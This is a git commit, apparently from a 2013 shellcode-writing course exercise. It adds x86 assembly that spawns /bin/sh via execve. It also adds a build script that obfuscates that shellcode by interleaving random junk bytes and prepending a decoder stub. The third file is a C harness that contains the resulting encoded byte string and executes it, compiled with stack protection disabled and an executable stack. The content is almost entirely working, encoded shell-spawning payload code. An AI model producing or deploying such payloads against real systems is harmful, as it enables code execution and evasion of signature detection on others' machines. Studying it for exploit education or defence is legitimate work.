minor updates

2013-04-11 13:49:58 +02:00 · 2013-04-11 13:49:58 +02:00 · 2e68426079
commit 2e68426079
parent 24afc2aec6
4 changed files with 147 additions and 0 deletions
--- a/exam4/execve-stack.nasm
+++ b/exam4/execve-stack.nasm
@ -0,0 +1,70 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+        ; 
+        ; =============================== EXECVE =====================================
+        ;
+	; Now as we forwarded sockfd to a client, we can spawn shell.
+       	; Prepare the path, in little-endian, using the Python
+        ; >>> '//bin/sh'[::-1].encode('hex')
+        ; '68732f6e69622f2f'
+        ;
+        ; int execve(const char *filename, char *const argv[], char *const envp[]);
+        ; EAX           EBX,                    ECX,            EDX
+        ; 11            '//bin/sh'              PTR to EBX      NULL
+       	;
+        ;
+
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+
+	
+	; === EXIT(0) ===
+	; void _exit(int status);
+	; /usr/include/asm/unistd_32.h:#define __NR_exit		  1
+	xor eax, eax	; EAX = 0x000000
+	mov al, 1	; EAX = 0x000001	1: exit syscall
+	xor ebx, ebx	; EBX = 0x000000	0: success status
+	int 0x80
+
+
+;section .data
--- a/exam4/make.sh
+++ b/exam4/make.sh
@ -0,0 +1,66 @@
+#!/usr/bin/env sh
+#
+# This script will generate shellcode.c and compile it
+#
+
+#
+# Compile the payload and decoder
+#
+echo " [+] Compiling the payload and decoder ..."
+SPAYLOAD=./execve-stack
+nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
+SDECODER=./decoder
+nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o
+
+echo " [+] Preparing decoder shellcode ..."
+DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)
+
+#
+# Encode the payload shellcode
+#
+echo " [+] Encoding the payload shellcode ..."
+#
+#  $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
+#  00000000  37                aaa
+#  00000001  FA                cli
+#  00000002  D6                salc
+#  00000003  3F                aas
+#
+
+garbage=('\x37' '\xFA' '\xD6' '\x3F');
+ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i;  echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"")
+
+FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
+
+#
+# Generate shellcode.c
+#
+echo " [+] Generating shellcode.c file ..."
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+$FULL_SHELLCODE;
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
+EOF
+
+#
+# Compile C code with GCC
+#
+echo " [+] Compiling shellcode.c with GCC ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+ls -la ./shellcode
+
+#
+# Cleanup
+#
+rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o
+
--- a/exam4/shellcode
+++ b/exam4/shellcode
--- a/exam4/shellcode.c
+++ b/exam4/shellcode.c
@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF";
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}